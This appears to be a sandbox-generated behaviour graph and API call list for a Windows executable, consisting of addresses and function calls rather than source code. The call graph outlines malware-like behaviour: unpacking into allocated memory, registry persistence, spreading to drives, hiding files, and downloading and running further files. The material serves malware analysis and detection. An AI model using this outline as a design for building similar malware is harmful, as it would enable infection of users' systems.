__getptd_noexit 44 API calls 14098->14099 14100 428013 14099->14100 14100->14082 14102 43342a ___lock_fhandle 14101->14102 14103 433485 14102->14103 14105 429cb8 __lock 44 API calls 14102->14105 14104 43348a RtlEnterCriticalSection 14103->14104 14107 4334a7 ___lock_fhandle 14103->14107 14104->14107 14106 433456 14105->14106 14108 4303e6 ___lock_fhandle InitializeCriticalSectionAndSpinCount 14106->14108 14110 43346d 14106->14110 14107->14086 14108->14110 14173 4334b5 14110->14173 14112 4305f3 __write_nolock 14111->14112 14113 430625 14112->14113 14114 43064c 14112->14114 14143 43061a 14112->14143 14116 42800e __write_nolock 44 API calls 14113->14116 14118 4306b4 14114->14118 14119 43068e 14114->14119 14115 426e9b ___mtold12 5 API calls 14120 430d15 14115->14120 14117 43062a 14116->14117 14122 427ffb __fclose_nolock 44 API calls 14117->14122 14121 4306c8 14118->14121 14177 430446 14118->14177 14123 42800e __write_nolock 44 API calls 14119->14123 14120->14094 14126 42f2dc __flsbuf 44 API calls 14121->14126 14125 430631 14122->14125 14127 430693 14123->14127 14128 42515e __fclose_nolock 4 API calls 14125->14128 14129 4306d3 14126->14129 14130 427ffb __fclose_nolock 44 API calls 14127->14130 14128->14143 14131 430979 14129->14131 14136 42834a __getptd 44 API calls 14129->14136 14132 43069c 14130->14132 14134 430989 14131->14134 14135 430c48 WriteFile 14131->14135 14133 42515e __fclose_nolock 4 API calls 14132->14133 14133->14143 14137 430a67 14134->14137 14159 43099d 14134->14159 14139 43095b 14135->14139 14140 430c7b GetLastError 14135->14140 14138 4306ee GetConsoleMode 14136->14138 14158 430b47 14137->14158 14163 430a76 14137->14163 14138->14131 14142 430719 14138->14142 14141 430cc6 14139->14141 14139->14143 14146 430c99 14139->14146 14140->14139 14141->14143 14145 427ffb __fclose_nolock 44 API calls 14141->14145 14142->14131 14144 43072b GetConsoleCP 14142->14144 14143->14115 14144->14139 14167 43074e 14144->14167 14147 430ce9 14145->14147 14149 430ca4 14146->14149 14150 430cb8 14146->14150 14152 42800e __write_nolock 44 API calls 14147->14152 14148 430bad WideCharToMultiByte 14148->14140 14154 430be4 WriteFile 14148->14154 14153 427ffb __fclose_nolock 44 API calls 14149->14153 14190 428021 14150->14190 14151 430a0b WriteFile 14151->14140 14151->14159 14152->14143 14160 430ca9 14153->14160 14157 430c1b GetLastError 14154->14157 14154->14158 14155 430aeb WriteFile 14155->14140 14155->14163 14157->14158 14158->14139 14158->14141 14158->14148 14158->14154 14159->14139 14159->14141 14159->14151 14162 42800e __write_nolock 44 API calls 14160->14162 14162->14143 14163->14139 14163->14141 14163->14155 14164 4336c1 48 API calls __fassign 14164->14167 14165 4307fa WideCharToMultiByte 14165->14139 14166 43082b WriteFile 14165->14166 14166->14140 14166->14167 14167->14139 14167->14140 14167->14164 14167->14165 14168 4334e5 11 API calls __putwch_nolock 14167->14168 14169 43087f WriteFile 14167->14169 14187 42f533 14167->14187 14168->14167 14169->14140 14169->14167 14208 4334be RtlLeaveCriticalSection 14170->14208 14172 430df1 14172->14093 14176 429bde RtlLeaveCriticalSection 14173->14176 14175 4334bc 14175->14103 14176->14175 14195 4333a7 14177->14195 14179 430464 14180 43047d SetFilePointer 14179->14180 14181 43046c 14179->14181 14183 430495 GetLastError 14180->14183 14185 430471 14180->14185 14182 427ffb __fclose_nolock 44 API calls 14181->14182 14182->14185 14184 43049f 14183->14184 14183->14185 14186 428021 __dosmaperr 44 API calls 14184->14186 14185->14121 14186->14185 14188 42f4fb __isleadbyte_l 46 API calls 14187->14188 14189 42f542 14188->14189 14189->14167 14191 42800e __write_nolock 44 API calls 14190->14191 14192 42802c __dosmaperr 14191->14192 14193 427ffb __fclose_nolock 44 API calls 14192->14193 14194 42803f 14193->14194 14194->14143 14196 4333b4 14195->14196 14197 4333cc 14195->14197 14198 42800e __write_nolock 44 API calls 14196->14198 14199 42800e __write_nolock 44 API calls 14197->14199 14202 433411 14197->14202 14200 4333b9 14198->14200 14203 4333fa 14199->14203 14201 427ffb __fclose_nolock 44 API calls 14200->14201 14204 4333c1 14201->14204 14202->14179 14205 427ffb __fclose_nolock 44 API calls 14203->14205 14204->14179 14206 433401 14205->14206 14207 42515e __fclose_nolock 4 API calls 14206->14207 14207->14202 14208->14172 14210 427332 14209->14210 14211 427345 RtlLeaveCriticalSection 14209->14211 14214 429bde RtlLeaveCriticalSection 14210->14214 14211->13841 14213 427342 14213->13841 14214->14213 14216 411191 DeleteObject 14215->14216 14217 41119c 14215->14217 14216->14217 14218 4111b0 DeleteObject 14217->14218 14220 4111bb 14217->14220 14218->14220 14219 4113bc 14220->14219 14223 411207 14220->14223 14237 411450 14220->14237 14222 411285 14226 4112a6 14222->14226 14230 42592a __fclose_nolock 44 API calls 14222->14230 14225 4112ca 14223->14225 14227 42592a __fclose_nolock 44 API calls 14223->14227 14229 411244 14223->14229 14224 4112c0 14258 41fe50 RaiseException 14224->14258 14231 41116e 14226->14231 14233 423d8e 2 API calls 14226->14233 14227->14223 14229->14222 14229->14224 14249 4113d0 14229->14249 14230->14222 14231->13435 14234 423d8e 14231->14234 14233->14231 14346 423cad 14234->14346 14236 423d9b 14236->13435 14238 41153a 14237->14238 14244 411463 14237->14244 14243 411546 14238->14243 14271 41fe50 RaiseException 14238->14271 14240 41165f 14240->14220 14241 411708 14242 42592a __fclose_nolock 44 API calls 14242->14243 14243->14240 14243->14242 14244->14241 14244->14243 14244->14244 14259 423acb 14244->14259 14247 41166e 14272 41fe50 RaiseException 14247->14272 14254 4113d8 14249->14254 14255 411403 14249->14255 14250 41142c 14250->14229 14251 41143b 14345 41fe50 RaiseException 14251->14345 14252 42592a __fclose_nolock 44 API calls 14252->14255 14254->14251 14254->14255 14257 4113d0 45 API calls 14254->14257 14255->14250 14255->14252 14256 411445 14257->14254 14258->14225 14261 424fc2 14259->14261 14260 425aa0 _malloc 44 API calls 14260->14261 14261->14260 14262 41152d 14261->14262 14263 428053 __calloc_impl 4 API calls 14261->14263 14267 424fe8 std::bad_alloc::bad_alloc 14261->14267 14262->14238 14262->14247 14263->14261 14264 42500e 14276 41e020 14264->14276 14267->14264 14273 426b6a 14267->14273 14270 425026 14271->14243 14272->14243 14282 426b2e 14273->14282 14275 426b77 14275->14264 14330 425215 14276->14330 14279 4252b6 14280 4252eb RaiseException 14279->14280 14281 4252df 14279->14281 14280->14270 14281->14280 14283 426b3a ___lock_fhandle 14282->14283 14290 42adc1 14283->14290 14289 426b5b ___lock_fhandle 14289->14275 14291 429cb8 __lock 44 API calls 14290->14291 14292 426b3f 14291->14292 14293 426a43 14292->14293 14294 4280fe __decode_pointer 4 API calls 14293->14294 14295 426a57 14294->14295 14296 4280fe __decode_pointer 4 API calls 14295->14296 14297 426a67 14296->14297 14298 426aea 14297->14298 14299 42a9ca __msize 45 API calls 14297->14299 14310 426b64 14298->14310 14303 426a85 14299->14303 14300 426ad1 14301 428083 __encode_pointer 4 API calls 14300->14301 14302 426adf 14301->14302 14305 428083 __encode_pointer 4 API calls 14302->14305 14303->14300 14304 426aa9 14303->14304 14313 42d65b 14303->14313 14304->14298 14307 42d65b __realloc_crt 50 API calls 14304->14307 14308 426abf 14304->14308 14305->14298 14307->14308 14308->14298 14318 428083 14308->14318 14326 42adca 14310->14326 14316 42d664 14313->14316 14314 42a7af _realloc 49 API calls 14314->14316 14315 42d6a3 14315->14304 14316->14314 14316->14315 14317 42d684 Sleep 14316->14317 14317->14316 14324 428097 14318->14324 14319 4280bc GetModuleHandleW 14320 4280d7 GetProcAddress 14319->14320 14321 4280cc 14319->14321 14323 4280b4 14320->14323 14322 42ad25 __crt_waiting_on_module_handle 2 API calls 14321->14322 14325 4280d2 14322->14325 14323->14300 14324->14319 14324->14323 14325->14320 14325->14323 14329 429bde RtlLeaveCriticalSection 14326->14329 14328 426b69 14328->14289 14329->14328 14331 425235 _strlen 14330->14331 14335 41e02c 14330->14335 14332 425aa0 _malloc 44 API calls 14331->14332 14331->14335 14333 425248 14332->14333 14333->14335 14336 428620 14333->14336 14335->14279 14337 428631 14336->14337 14338 428638 14336->14338 14337->14338 14343 42865e 14337->14343 14339 427ffb __fclose_nolock 44 API calls 14338->14339 14340 42863d 14339->14340 14341 42515e __fclose_nolock 4 API calls 14340->14341 14342 42864c 14341->14342 14342->14335 14343->14342 14344 427ffb __fclose_nolock 44 API calls 14343->14344 14344->14340 14345->14256 14347 423cbf GetProcessHeap HeapFree 14346->14347 14348 423cd0 14346->14348 14347->14236 14348->14236 12856 40fcc0 12861 40fe50 12856->12861 12859 40fd96 12859->12859 12860 40fdcd CreateFontIndirectA GetSysColor 12859->12860 12862 40fd4f CreatePen 12861->12862 12862->12859 12863 25115a4 12871 25114a0 12863->12871 12865 25115c7 12866 2511609 12865->12866 12905 2510000 12865->12905 12875 25156f4 12866->12875 12890 2513124 12866->12890 12868 251164d 12873 25114ce 12871->12873 12872 2511542 12872->12865 12873->12872 12910 2511360 12873->12910 12876 2515702 12875->12876 12877 2515708 12876->12877 12880 251575f 12876->12880 12878 25152c4 4 API calls 12877->12878 12879 2515749 12878->12879 12879->12868 12924 2515204 12880->12924 12882 25157c0 12929 25152c4 12882->12929 12884 25157f1 12946 2513764 12884->12946 12886 25157fd 12949 40104e __set_app_type __p__fmode __p__commode 12886->12949 12891 25156f4 12890->12891 12892 2515708 12891->12892 12893 251575f 12891->12893 12894 25152c4 4 API calls 12892->12894 12896 2515204 3 API calls 12893->12896 12895 2515749 12894->12895 12895->12868 12897 25157c0 12896->12897 12898 25152c4 4 API calls 12897->12898 12899 25157f1 12898->12899 12900 2513764 GlobalAlloc 12899->12900 12901 25157fd 12900->12901 12904 40104e 329 API calls 12901->12904 12902 251583d 12902->12895 12903 2513124 335 API calls 12902->12903 12903->12895 12904->12902 12906 2511570 12905->12906 13216 2511560 GetPEB 12906->13216 12908 2511583 13217 25115a4 12908->13217 12915 2510570 12910->12915 12912 2511379 12914 251147f 12912->12914 12918 2510540 12912->12918 12914->12873 12921 25102f0 12915->12921 12917 251057b VirtualAlloc 12917->12912 12919 25102f0 12918->12919 12920 251054b VirtualFree 12919->12920 12920->12914 12923 25102f5 12921->12923 12925 2513764 GlobalAlloc 12924->12925 12926 2515232 12925->12926 12927 25152a6 12926->12927 12961 25150c4 12926->12961 12927->12882 12930 2515322 12929->12930 12931 2515377 12930->12931 12934 25153e4 12930->12934 12932 25153ae 12931->12932 12933 2513854 VirtualAlloc 12931->12933 12935 2513854 VirtualAlloc 12932->12935 12937 25153dc 12932->12937 12933->12932 12934->12937 12991 2513894 12934->12991 12935->12937 12940 25154fc 12937->12940 12994 2514654 12937->12994 12939 2513894 VirtualProtect 12942 2515548 12939->12942 12940->12939 12941 25155b9 12998 2513134 GetPEB 12941->12998 12942->12941 12944 2513894 VirtualProtect 12942->12944 12944->12942 12945 25155ca 12945->12884 12947 2513424 12946->12947 12948 251376f GlobalAlloc 12947->12948 12948->12886 12950 4010bd 12949->12950 12951 4010d1 12950->12951 12952 4010c5 __setusermatherr 12950->12952 13002 4011b8 _controlfp 12951->13002 12952->12951 12954 4010d6 _initterm __getmainargs _initterm 12955 40112a GetStartupInfoA 12954->12955 12957 40115e GetModuleHandleA 12955->12957 13003 40373e 12957->13003 12972 2513854 12961->12972 12963 25150dd 12964 2513764 GlobalAlloc 12963->12964 12965 251512f 12964->12965 12975 2514f34 12965->12975 12967 251515e 12981 2514de4 12967->12981 12969 25151b8 12970 25151e3 12969->12970 12985 2513824 12969->12985 12970->12926 12988 2513424 12972->12988 12974 251385f VirtualAlloc 12974->12963 12976 2513764 GlobalAlloc 12975->12976 12978 2514f5a 12976->12978 12977 25150b1 12977->12967 12978->12977 12979 2513764 GlobalAlloc 12978->12979 12980 2514de4 GlobalAlloc 12978->12980 12979->12978 12980->12978 12982 2514df3 12981->12982 12983 2513764 GlobalAlloc 12982->12983 12984 2514e4e 12983->12984 12984->12969 12986 2513424 12985->12986 12987 251382f VirtualFree 12986->12987 12987->12970 12990 2513429 12988->12990 12992 2513424 12991->12992 12993 251389f VirtualProtect 12992->12993 12993->12934 12995 25146c7 12994->12995 12997 25146ce 12994->12997 12995->12940 12997->12995 12999 2513904 12997->12999 12998->12945 13000 2513424 12999->13000 13001 251390f LoadLibraryA 13000->13001 13001->12997 13002->12954 13078 4047c0 13003->13078 13008 403d03 ExitProcess 13009 403d0b 7 API calls 13010 403dc0 13009->13010 13011 403ed6 Sleep _snwprintf 13010->13011 13012 403dcd 7 API calls 13010->13012 13015 403f20 13011->13015 13013 403e86 13012->13013 13014 403e8a PathFileExistsW 13012->13014 13013->13011 13016 403eaa CopyFileW 13014->13016 13017 403e9b CreateDirectoryW 13014->13017 13020 403fa7 SetFileAttributesW SetFileAttributesW RegOpenKeyExW 13015->13020 13021 40413b Sleep RegOpenKeyExW 13015->13021 13018 403ec4 13016->13018 13019 403ec6 Sleep 13016->13019 13017->13016 13018->13011 13018->13019 13022 404070 RegOpenKeyExW 13020->13022 13023 403feb RegSetValueExW RegCloseKey 13020->13023 13024 404220 RegOpenKeyExW 13021->13024 13025 40416c RegQueryValueExW 13021->13025 13026 404096 RegSetValueExW RegCloseKey 13022->13026 13027 40411b 13022->13027 13023->13022 13030 404246 RegQueryValueExW 13024->13030 13031 4043f8 RegOpenKeyExW 13024->13031 13028 404214 RegCloseKey 13025->13028 13029 40419b RegSetValueExW 13025->13029 13026->13027 13093 40206e memset CreateProcessW 13027->13093 13028->13024 13029->13028 13035 404291 RegOpenKeyExW 13030->13035 13036 404273 RegSetValueExW 13030->13036 13032 4044a6 RegOpenKeyExW 13031->13032 13033 40441e 13031->13033 13043 404554 RegOpenKeyExW 13032->13043 13050 4044cc 13032->13050 13046 40449a RegCloseKey 13033->13046 13047 40443d RegQueryValueExW 13033->13047 13041 4042b3 RegCreateKeyExA 13035->13041 13042 4042d9 RegOpenKeyExW 13035->13042 13036->13035 13041->13042 13048 4043ec RegCloseKey 13042->13048 13049 4042ff RegQueryValueExW 13042->13049 13044 404576 RegQueryValueExW 13043->13044 13045 4045cd Sleep CreateThread Sleep 13043->13045 13051 4045c1 RegCloseKey 13044->13051 13052 4045a3 RegSetValueExW 13044->13052 13097 401fac memset memset ExpandEnvironmentStringsW _snwprintf PathFileExistsW 13045->13097 13151 402c41 memset GetModuleFileNameW Sleep _wfopen 13045->13151 13046->13032 13047->13033 13054 404472 RegSetValueExW 13047->13054 13048->13031 13055 40434a RegQueryValueExW 13049->13055 13056 40432c RegSetValueExW 13049->13056 13057 404548 RegCloseKey 13050->13057 13058 4044eb RegQueryValueExW 13050->13058 13051->13045 13052->13051 13054->13033 13060 404395 RegQueryValueExW 13055->13060 13061 404377 RegSetValueExW 13055->13061 13056->13055 13057->13043 13058->13050 13062 404520 RegSetValueExW 13058->13062 13065 4043e0 RegCloseKey 13060->13065 13066 4043c2 RegSetValueExW 13060->13066 13061->13060 13062->13050 13063 404604 Sleep CreateThread Sleep 13068 404632 13063->13068 13161 4035e4 11 API calls 13063->13161 13064 40466b Sleep 13067 404676 Sleep 13064->13067 13065->13048 13066->13065 13076 404694 13067->13076 13068->13064 13069 404648 Sleep 13068->13069 13101 401cda memset 13069->13101 13070 4046a1 Sleep memset _snprintf 13072 401cda 8 API calls 13070->13072 13073 4046f5 Sleep 13072->13073 13073->13076 13074 40471f Sleep memset _snprintf 13108 401674 InternetOpenA 13074->13108 13076->13067 13076->13070 13076->13074 13077 40477e CreateThread 13076->13077 13077->13076 13134 402df9 14 API calls 13077->13134 13079 40374b Sleep 13078->13079 13080 40317d GetModuleHandleA 13079->13080 13081 403236 Sleep 13080->13081 13082 40321c GetProcAddress 13080->13082 13087 403244 13081->13087 13082->13081 13083 40322e ExitProcess 13082->13083 13084 40326c Sleep 13086 403281 13084->13086 13088 4032a2 CreateMutexA GetLastError 13086->13088 13089 403287 GetModuleHandleA 13086->13089 13087->13084 13090 403262 ExitProcess 13087->13090 13126 401e97 CreateToolhelp32Snapshot 13087->13126 13088->13008 13088->13009 13091 40327a 13089->13091 13092 403298 ExitProcess 13089->13092 13091->13086 13094 4020ca Sleep ShellExecuteW 13093->13094 13095 4020c6 Sleep ExitProcess 13093->13095 13096 4020ef 13094->13096 13096->13095 13098 402029 _wfopen 13097->13098 13099 402066 13097->13099 13098->13099 13100 40204b fclose SetFileAttributesW 13098->13100 13099->13063 13099->13064 13100->13099 13102 401d01 _snprintf 13101->13102 13103 401d1d 13101->13103 13102->13103 13104 401d41 InternetOpenA 13103->13104 13105 401d25 _snprintf 13103->13105 13106 401d81 Sleep InternetCloseHandle InternetCloseHandle 13104->13106 13107 401d63 InternetOpenUrlA 13104->13107 13105->13104 13106->13068 13107->13106 13109 401ccd InternetCloseHandle 13108->13109 13110 40169d InternetOpenUrlA 13108->13110 13125 4019f8 13109->13125 13111 401cc4 InternetCloseHandle 13110->13111 13112 4016be PathFindFileNameA 13110->13112 13111->13109 13112->13111 13113 4016d4 13112->13113 13114 40172f HttpQueryInfoA 13113->13114 13115 40174e 13113->13115 13114->13115 13116 4017a9 HttpQueryInfoA 13115->13116 13117 4017c8 13115->13117 13116->13117 13118 401823 HttpQueryInfoA 13117->13118 13119 401842 13117->13119 13118->13119 13120 40189d HttpQueryInfoA 13119->13120 13121 4018bc 13119->13121 13120->13121 13122 401945 InternetCloseHandle InternetCloseHandle 13121->13122 13123 401926 HttpQueryInfoA 13121->13123 13124 40196a 13122->13124 13123->13122 13124->13111 13124->13125 13125->13076 13127 401eb2 13126->13127 13128 401eb9 Process32First 13126->13128 13127->13087 13128->13127 13129 401edd CharLowerA 13128->13129 13130 401eff 13129->13130 13131 401f88 Process32Next 13130->13131 13132 401f7a CloseHandle 13130->13132 13131->13129 13133 401f9f FindCloseChangeNotification 13131->13133 13132->13127 13133->13127 13135 403073 InternetCloseHandle Sleep 13134->13135 13136 402f4f InternetOpenUrlW 13134->13136 13137 403099 memset rand rand _snwprintf URLDownloadToFileW 13135->13137 13138 40316f ExitThread 13135->13138 13139 403067 InternetCloseHandle 13136->13139 13140 402f7d CreateFileW 13136->13140 13137->13138 13141 403114 memset _snwprintf DeleteFileW Sleep 13137->13141 13139->13135 13142 40305b CloseHandle 13140->13142 13143 402fac LoadImageA 13140->13143 13144 40206e 4 API calls 13141->13144 13142->13139 13145 402ffc CloseHandle _snwprintf DeleteFileW Sleep 13143->13145 13146 402fcf 13143->13146 13147 40316e 13144->13147 13149 40206e 4 API calls 13145->13149 13146->13145 13148 402fd8 WriteFile 13146->13148 13147->13138 13148->13143 13150 40304c 13149->13150 13150->13142 13152 402cca Sleep 13151->13152 13153 402c9b fseek ftell fclose 13151->13153 13154 402cd5 memset memset GetLogicalDriveStringsW 13152->13154 13153->13152 13159 402d1c 13154->13159 13155 402de3 Sleep 13155->13154 13156 402d2a GetDriveTypeW 13157 402da7 GetDriveTypeW 13156->13157 13156->13159 13157->13159 13158 402d54 SetErrorMode GetVolumeInformationW 13158->13159 13159->13155 13159->13156 13159->13157 13159->13158 13160 402204 70 API calls 13159->13160 13160->13159 13162 403732 ExitThread 13161->13162 13163 4036c3 SetFileAttributesW 13161->13163 13166 4036df 13163->13166 13164 4036ec GetDriveTypeW 13165 40370b SetCurrentDirectoryW 13164->13165 13164->13166 13165->13166 13166->13162 13166->13164 13166->13165 13168 4032a4 memset memset FindFirstFileW 13166->13168 13169 4035e2 13168->13169 13183 403302 13168->13183 13169->13166 13170 4035b3 Sleep FindNextFileW 13173 4035d6 FindClose 13170->13173 13170->13183 13171 403323 SetCurrentDirectoryW 13171->13183 13172 40334a GetFullPathNameW 13172->13170 13172->13183 13173->13169 13174 4032a4 33 API calls 13175 40333a SetCurrentDirectoryW 13174->13175 13175->13183 13176 4033f4 CharLowerW 13191 401000 wcsstr 13176->13191 13179 401000 wcsstr 13179->13183 13180 403429 Sleep 13180->13183 13183->13170 13183->13171 13183->13172 13183->13174 13183->13176 13183->13179 13184 401294 28 API calls 13183->13184 13186 401294 28 API calls 13183->13186 13188 4035a6 Sleep 13183->13188 13189 403538 PathFindFileNameW 13183->13189 13190 40356a SetFileAttributesW DeleteFileW Sleep CopyFileW 13183->13190 13192 401da3 CoInitialize CoCreateInstance 13183->13192 13197 401294 CreateFileW 13183->13197 13185 4034a8 Sleep 13184->13185 13185->13183 13187 4034e8 Sleep 13186->13187 13187->13183 13188->13183 13189->13183 13189->13188 13190->13188 13191->13183 13193 401ddc 13192->13193 13194 401e8d CoUninitialize 13192->13194 13195 401e82 13193->13195 13196 401e69 Sleep 13193->13196 13194->13180 13195->13194 13196->13195 13198 40138d GetFileSize 13197->13198 13199 401386 Sleep 13197->13199 13200 4013aa CloseHandle 13198->13200 13201 4013bd CreateFileW GetFileSize 13198->13201 13199->13183 13200->13199 13202 40141a SetFilePointer CreateFileMappingA 13201->13202 13203 4013fb CloseHandle CloseHandle 13201->13203 13204 401478 MapViewOfFile 13202->13204 13205 401459 CloseHandle CloseHandle 13202->13205 13203->13199 13206 4014c6 13204->13206 13207 40149b CloseHandle CloseHandle CloseHandle 13204->13207 13205->13199 13212 4011f4 GlobalAlloc 13206->13212 13207->13199 13210 4011f4 2 API calls 13211 4015b5 8 API calls 13210->13211 13211->13199 13213 40128d lstrlenA memset memcpy 13212->13213 13214 401212 GlobalFree 13212->13214 13213->13210 13214->13213 13216->12908 13218 25114a0 2 API calls 13217->13218 13219 25115c7 13218->13219 13220 2511609 13219->13220 13221 2510000 338 API calls 13219->13221 13223 2513124 335 API calls 13220->13223 13224 25156f4 335 API calls 13220->13224 13221->13220 13222 251164d 13223->13222 13224->13222
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000007B), ref: 0040B567
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B578
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040B648
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040B662
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040B727
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040B7F6
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040B849
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BC9C
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BCEF
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BD75
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BE92
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BEE3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
